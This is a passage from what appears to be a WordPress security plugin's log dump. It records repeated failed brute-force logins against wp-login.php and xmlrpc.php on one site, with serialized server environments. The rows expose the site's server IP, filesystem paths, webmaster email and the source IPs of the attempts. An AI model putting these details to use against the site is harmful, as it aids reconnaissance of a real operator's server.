23:50:20',17740744,19232776,'https://bintara.com.my/wp-login.php',1,0,'103.117.212.32'),(24799,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.117.212.32\";s:11:\"REMOTE_PORT\";s:5:\"47656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFxPo75s89pqgR69SLo0gAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568764222.1971\";s:12:\"REQUEST_TIME\";s:10:\"1568764222\";}}','notice','2019-09-17 23:50:23','2019-09-17 23:50:22',18257600,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'103.117.212.32'),(24800,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"28790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFyaI75s89pqgR69SLpSQAAAZc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568764520.7788\";s:12:\"REQUEST_TIME\";s:10:\"1568764520\";}}','notice','2019-09-17 23:55:22','2019-09-17 23:55:21',17740872,19231904,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24801,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"29530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFya475s89pqgR69SLpSwAAAYQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568764523.825\";s:12:\"REQUEST_TIME\";s:10:\"1568764523\";}}','notice','2019-09-17 23:55:25','2019-09-17 23:55:24',18252960,19548280,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24802,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"39197\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFyvI75s89pqgR69SLpawAAAYA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568764604.9734\";s:12:\"REQUEST_TIME\";s:10:\"1568764604\";}}','notice','2019-09-17 23:56:46','2019-09-17 23:56:45',17741088,19231904,'https://bintara.com.my/wp-login.php',1,0,'212.227.20.208'),(24803,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"39570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFywG4SfF9g@8lNlxwk7AAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568764608.3896\";s:12:\"REQUEST_TIME\";s:10:\"1568764608\";}}','notice','2019-09-17 23:56:50','2019-09-17 23:56:48',18253008,19548280,'https://bintara.com.my/xmlrpc.php',1,0,'212.227.20.208'),(24804,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"109.87.200.193\";s:11:\"REMOTE_PORT\";s:5:\"37586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF3lo75s89pqgR69SLscgAAAYA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568765846.678\";s:12:\"REQUEST_TIME\";s:10:\"1568765846\";}}','notice','2019-09-18 00:17:28','2019-09-18 00:17:27',17740424,19231568,'https://bintara.com.my/wp-login.php',1,0,'109.87.200.193'),(24805,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"109.87.200.193\";s:11:\"REMOTE_PORT\";s:5:\"38404\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF3mo75s89pqgR69SLsdgAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568765850.2731\";s:12:\"REQUEST_TIME\";s:10:\"1568765850\";}}','notice','2019-09-18 00:17:32','2019-09-18 00:17:30',18252960,19548280,'https://bintara.com.my/xmlrpc.php',1,0,'109.87.200.193'),(23708,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"185.70.8.20\";s:11:\"REMOTE_PORT\";s:5:\"37896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXUl6cvQBPI6v9v4gd9bXQAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567958505.6238\";s:12:\"REQUEST_TIME\";s:10:\"1567958505\";}}','notice','2019-09-08 16:01:46','2019-09-08 16:01:45',17701056,19192456,'https://bintara.com.my/wp-login.php',1,0,'185.70.8.20'),(23709,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"185.70.8.20\";s:11:\"REMOTE_PORT\";s:5:\"38490\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXUl7YjnkVx6k5bJrKjtSQAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567958510.4333\";s:12:\"REQUEST_TIME\";s:10:\"1567958510\";}}','notice','2019-09-08 16:01:51','2019-09-08 